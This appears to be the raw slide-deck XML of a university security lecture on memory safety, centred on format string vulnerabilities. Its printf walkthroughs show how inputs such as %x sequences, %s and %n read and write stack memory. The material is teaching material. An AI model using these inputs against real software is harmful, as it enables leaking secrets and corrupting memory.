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5D2A71D-632E-4485-A4D9-6FDEFA215159}">
  <a:tblStyle styleId="{65D2A71D-632E-4485-A4D9-6FDEFA2151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8DD91E5-4378-45C4-B873-F09FD938B995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we.mitre.org/top25/archive/2020/2020_cwe_top25.html" TargetMode="Externa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awfareblog.com/whats-deal-log4shell-security-nightmare" TargetMode="Externa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avidhamann.de/2020/04/05/exploiting-python-pickle/" TargetMode="Externa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frohoff/ysoserial" TargetMode="Externa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xkcd.com/2347/" TargetMode="Externa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028d3c3286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028d3c3286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FA23, we </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>caught some mistakes during live lecture and they're now fixed in this version of the slides. See the speaker notes for the mistakes we caught.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28d3c3286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28d3c3286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28d3c328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28d3c328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028d3c3286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028d3c3286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028d3c3286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028d3c3286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028d3c3286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028d3c3286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028d3c3286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028d3c328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028d3c3286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028d3c3286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028d3c3286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028d3c3286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028d3c3286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028d3c3286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028d3c3286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028d3c3286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028d3c328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028d3c328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028d3c3286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028d3c3286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028d3c3286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028d3c3286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028d3c3286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028d3c3286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Fixed during live lecture, FA23: The input on this slide mistakenly said %s, not %n.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028d3c3286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028d3c3286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Fixed during live lecture, FA23: In this entire demo, the integer argument mistakenly said 28, not 16.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028d3c3286_0_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028d3c3286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028d3c3286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028d3c3286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028d3c3286_0_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028d3c3286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028d3c3286_0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028d3c3286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028d3c3286_0_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028d3c3286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028d3c3286_0_5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028d3c3286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028d3c3286_0_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028d3c3286_0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028d3c3286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028d3c3286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028d3c3286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2028d3c3286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028d3c3286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028d3c3286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028d3c3286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028d3c3286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FA23 update: Marked this section of slides as optional, as we didn't get to them in time.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028d3c3286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028d3c3286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028d3c3286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028d3c3286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028d3c3286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2028d3c3286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028d3c3286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028d3c3286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028d3c3286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028d3c3286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028d3c3286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028d3c3286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028d3c3286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028d3c3286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028d3c3286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028d3c3286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028d3c3286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028d3c3286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https://cwe.mitre.org/top25/archive/2020/2020_cwe_top25.html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028d3c3286_0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028d3c3286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028d3c3286_0_6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028d3c3286_0_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028d3c3286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028d3c3286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Fixed during live lecture, FA23: In this entire demo, the address on the stack diagram mistakenly said \xff, not \xcd.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028d3c3286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2028d3c3286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028d3c3286_0_7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028d3c3286_0_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028d3c3286_0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2028d3c3286_0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2028d3c3286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2028d3c3286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2028d3c3286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2028d3c3286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2028d3c3286_0_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2028d3c3286_0_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2028d3c3286_0_8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2028d3c3286_0_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028d3c3286_0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2028d3c3286_0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2028d3c3286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2028d3c3286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028d3c3286_0_9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028d3c3286_0_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028d3c3286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2028d3c3286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2028d3c3286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2028d3c3286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22ec3c9742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22ec3c9742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22ec3c97424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22ec3c97424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22ec3c97424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22ec3c97424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https://www.lawfareblog.com/whats-deal-log4shell-security-nightmare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22ec3c97424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22ec3c97424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22ec3c97424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22ec3c97424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2ec3c97424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22ec3c97424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https://davidhamann.de/2020/04/05/exploiting-python-pickle/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22ec3c97424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22ec3c97424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https://github.com/frohoff/ysoserial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22ec3c97424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22ec3c97424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https://xkcd.com/2347/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2ec3c97424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2ec3c97424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22ec3c97424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22ec3c97424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2028d3c3286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2028d3c3286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Computer Science 161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20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/94.html" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/416.html" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/200.html" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/78.html" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/352.html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hyperlink" Target="https://cwe.mitre.org/data/definitions/79.html" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/89.html" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/22.html" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/190.html" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/287.html" TargetMode="External"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/476.html" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/787.html" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/732.html" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/20.html" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/434.html" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/125.html" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/119.html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hyperlink" Target="https://www.lawfareblog.com/whats-deal-log4shell-security-nightmare" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Memory Safety Vulnerabilities</a:t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3 Extra Slides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Vulnerabilities</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p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3.3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behavior</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p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takes in an variable number of arguments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does it know how many arguments that it received?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 infers it from the first argument: the format string!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printf("One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%s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costs </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1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%d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",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fruit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1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price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happens if the arguments are mismatched?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behavior</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="86" name="Google Shape;86;p18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="817850" y="2091425"/>
            <a:ext cx="3471000" cy="116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func(void) {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 = 42;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printf("%d\n", 123);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781600" y="3338200"/>
            <a:ext cx="40794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</a:rPr>
              <a:t>assumes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> that there is 1 more argument because there is one format sequence and will look 4 bytes up the stack for the argument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2453000" y="4105925"/>
            <a:ext cx="28341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there is no argument?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="89" name="Google Shape;89;p18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func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func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 = 42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123 (arg to printf)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&amp;"%d\n"(arg to printf)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90" name="Google Shape;90;p18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5973000" y="3371525"/>
            <a:ext cx="313372" cy="148469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91" name="Google Shape;91;p18"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6286375" y="4709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92" name="Google Shape;92;p18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8490750" y="32165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93" name="Google Shape;93;p18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8490750" y="29667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behavior</a:t>
            </a:r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817850" y="2091425"/>
            <a:ext cx="3471000" cy="116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func(void) {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 = 42;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printf("%d\n");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1353500" y="3982850"/>
            <a:ext cx="41874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Because the format string contains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%d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>, it will still look 4 bytes up and print the value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secret</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>!</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="102" name="Google Shape;102;p19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func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func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 = 42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&amp;"%d\n"(arg to printf)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103" name="Google Shape;103;p19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5973000" y="3122502"/>
            <a:ext cx="313372" cy="1733632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104" name="Google Shape;104;p19"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6286375" y="4709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105" name="Google Shape;105;p19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8490750" y="29527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106" name="Google Shape;106;p19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8490750" y="27029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Vulnerabilities</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="112" name="Google Shape;112;p20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2109750" y="2091425"/>
            <a:ext cx="4924500" cy="1908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3" name="Google Shape;11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4" name="Google Shape;114;p20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6083550" y="1296450"/>
            <a:ext cx="21582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issue here?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Vulnerabilities</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="120" name="Google Shape;12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Now, the attacker can specify any format string they want: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printf("100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 d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one!")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Prints 4 bytes on the stack, 8 bytes above the RIP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printf("100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 s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topped.")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Print the bytes </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>pointed to</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> by the address located 8 bytes above the RIP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, until the first NULL byte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%x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%x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%x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%x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...")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Print a series of values on the stack in hex</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="122" name="Google Shape;122;p21"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5547425" y="2428225"/>
            <a:ext cx="3342300" cy="1262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8" name="Google Shape;128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Vulnerability Walkthrough</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="129" name="Google Shape;129;p22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="384600" y="4047625"/>
            <a:ext cx="41874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that strings are passed by reference in C, so the argument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is actually a pointer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buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>, which is in static memory.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="130" name="Google Shape;130;p22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="351925" y="1544850"/>
            <a:ext cx="4924500" cy="2124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*secret_string = "pancake";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secret_number = 42;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5820625" y="2147675"/>
            <a:ext cx="465763" cy="268796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132" name="Google Shape;132;p22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secret_string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secret_number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graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="133" name="Google Shape;133;p22"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6286375" y="397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4832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'e'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'p'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'c'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134" name="Google Shape;134;p22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5973025" y="2645275"/>
            <a:ext cx="313372" cy="1711680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Vulnerability Walkthrough</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="141" name="Google Shape;141;p23"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="179400" y="1216525"/>
            <a:ext cx="13389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%d%s</a:t>
            </a:r>
            <a:endParaRPr b="1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1959275" y="1216525"/>
            <a:ext cx="3758700" cy="1847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*secret_string = "pancake";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secret_number = 42;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179400" y="1747475"/>
            <a:ext cx="133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3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="384600" y="3663125"/>
            <a:ext cx="3801300" cy="10467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We’re calling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printf("%d%s")</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>.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reads its first argument (arg0), sees two format specifiers, and expects two more arguments (arg1 and arg2).</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="145" name="Google Shape;145;p23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5820625" y="2147675"/>
            <a:ext cx="465763" cy="268796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146" name="Google Shape;146;p23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secret_string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secret_number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147" name="Google Shape;147;p23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5973025" y="2645275"/>
            <a:ext cx="313372" cy="1711680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148" name="Google Shape;148;p23"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8472450" y="24828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149" name="Google Shape;149;p23"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8472450" y="22330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  <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="150" name="Google Shape;150;p23"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8472450" y="19707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arg2</a:t>
            </a:r>
            <a:endParaRPr sz="1000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="151" name="Google Shape;151;p23"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6286375" y="397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's'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'e'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'p'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'c'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Vulnerability Walkthrough</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="158" name="Google Shape;158;p24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="179400" y="1216525"/>
            <a:ext cx="13389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%d%s</a:t>
            </a:r>
            <a:endParaRPr b="1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1959275" y="1216525"/>
            <a:ext cx="3758700" cy="1847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*secret_string = "pancake";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secret_number = 42;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179400" y="1747475"/>
            <a:ext cx="133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42</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="161" name="Google Shape;161;p24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="384600" y="3663125"/>
            <a:ext cx="41874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format specifier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%d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> says to treat the next argument (arg1) as an integer and print it out.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="162" name="Google Shape;162;p24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5820625" y="2147675"/>
            <a:ext cx="465763" cy="268796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163" name="Google Shape;163;p24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secret_string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secret_number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164" name="Google Shape;164;p24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5973025" y="2645275"/>
            <a:ext cx="313372" cy="1711680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165" name="Google Shape;165;p24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8472450" y="24828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166" name="Google Shape;166;p24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8472450" y="22330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  <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="167" name="Google Shape;167;p24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8472450" y="19707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arg2</a:t>
            </a:r>
            <a:endParaRPr sz="1000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="168" name="Google Shape;168;p24"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6286375" y="397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's'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'e'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'p'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'c'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" name="Google Shape;174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Vulnerability Walkthrough</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="175" name="Google Shape;175;p25"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="179400" y="1216525"/>
            <a:ext cx="13389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%d%s</a:t>
            </a:r>
            <a:endParaRPr b="1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1959275" y="1216525"/>
            <a:ext cx="3758700" cy="1847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*secret_string = "pancake";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secret_number = 42;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179400" y="1747475"/>
            <a:ext cx="133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42pancake</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="178" name="Google Shape;178;p25"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="483250" y="3419375"/>
            <a:ext cx="41874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second format specifier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%s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> says to treat the next argument (arg2) as an string and print it out.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="179" name="Google Shape;179;p25"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="808000" y="3978425"/>
            <a:ext cx="41874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%s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> will dereference the pointer at arg2 and print until it sees a null byte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'\0'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="180" name="Google Shape;180;p25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5820625" y="2147675"/>
            <a:ext cx="465763" cy="268796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181" name="Google Shape;181;p25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secret_string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secret_number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182" name="Google Shape;182;p25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5973025" y="2645275"/>
            <a:ext cx="313372" cy="1711680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183" name="Google Shape;183;p25"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8472450" y="24828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184" name="Google Shape;184;p25"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8472450" y="22330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  <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="185" name="Google Shape;185;p25"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8472450" y="19707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arg2</a:t>
            </a:r>
            <a:endParaRPr sz="1000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="186" name="Google Shape;186;p25"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6286375" y="397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's'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'e'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'p'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'c'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Vulnerabilities</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="192" name="Google Shape;19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They can also write values using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lang="en"/>
              <a:t> specifier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lang="en"/>
              <a:t> treats the next argument as a </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>pointer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> and writes the number of bytes printed so far to that address (usually used to calculate output spacing)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printf("item %d:%n", 3, &amp;val)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> stores 7 in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val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printf("item %d:%n", 987, &amp;val)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> stores 9 in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val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printf("000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")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/>
              <a:t>Writes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> the value 3 to the integer </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>pointed to</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> by address located 8 bytes above the RIP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5547425" y="2428225"/>
            <a:ext cx="33423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buf[64];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0" name="Google Shape;200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Vulnerability Walkthrough</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="201" name="Google Shape;201;p27"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="179400" y="1216525"/>
            <a:ext cx="13389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%d%n</a:t>
            </a:r>
            <a:endParaRPr b="1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1959275" y="1216525"/>
            <a:ext cx="3758700" cy="1847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*secret_string = "pancake";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secret_number = 42;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179400" y="1747475"/>
            <a:ext cx="133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7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="384600" y="3663125"/>
            <a:ext cx="3801300" cy="10467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We’re calling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printf("%d%n")</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>.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reads its first argument (arg0), sees two format specifiers, and expects two more arguments (arg1 and arg2).</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="205" name="Google Shape;205;p27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5820625" y="2147675"/>
            <a:ext cx="465763" cy="268796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206" name="Google Shape;206;p27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secret_string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secret_number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207" name="Google Shape;207;p27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5973025" y="2645275"/>
            <a:ext cx="313372" cy="1711680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08" name="Google Shape;208;p27"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8472450" y="24828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209" name="Google Shape;209;p27"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8472450" y="22330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  <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="210" name="Google Shape;210;p27"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8472450" y="19707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arg2</a:t>
            </a:r>
            <a:endParaRPr sz="1000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="211" name="Google Shape;211;p27"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6286375" y="397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'e'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'p'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'c'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7" name="Google Shape;217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Vulnerability Walkthrough</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="218" name="Google Shape;218;p28"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="179400" y="1216525"/>
            <a:ext cx="13389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%d%n</a:t>
            </a:r>
            <a:endParaRPr b="1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9" name="Google Shape;219;p28"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1959275" y="1216525"/>
            <a:ext cx="3758700" cy="1847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*secret_string = "pancake";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secret_number = 42;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179400" y="1747475"/>
            <a:ext cx="133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42</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="221" name="Google Shape;221;p28"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="384600" y="3663125"/>
            <a:ext cx="41874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format specifier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%d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> says to treat the next argument (arg1) as an integer and print it out.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="222" name="Google Shape;222;p28"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5820625" y="2147675"/>
            <a:ext cx="465763" cy="268796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223" name="Google Shape;223;p28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secret_string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secret_number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224" name="Google Shape;224;p28"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5973025" y="2645275"/>
            <a:ext cx="313372" cy="1711680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25" name="Google Shape;225;p28"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8472450" y="24828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226" name="Google Shape;226;p28"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8472450" y="22330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  <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="227" name="Google Shape;227;p28"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8472450" y="19707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arg2</a:t>
            </a:r>
            <a:endParaRPr sz="1000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="228" name="Google Shape;228;p28"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6286375" y="397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'e'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'p'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'c'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Vulnerability Walkthrough</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="235" name="Google Shape;235;p29"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="179400" y="1216525"/>
            <a:ext cx="1338900" cy="400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%d%n</a:t>
            </a:r>
            <a:endParaRPr b="1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6" name="Google Shape;236;p29"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
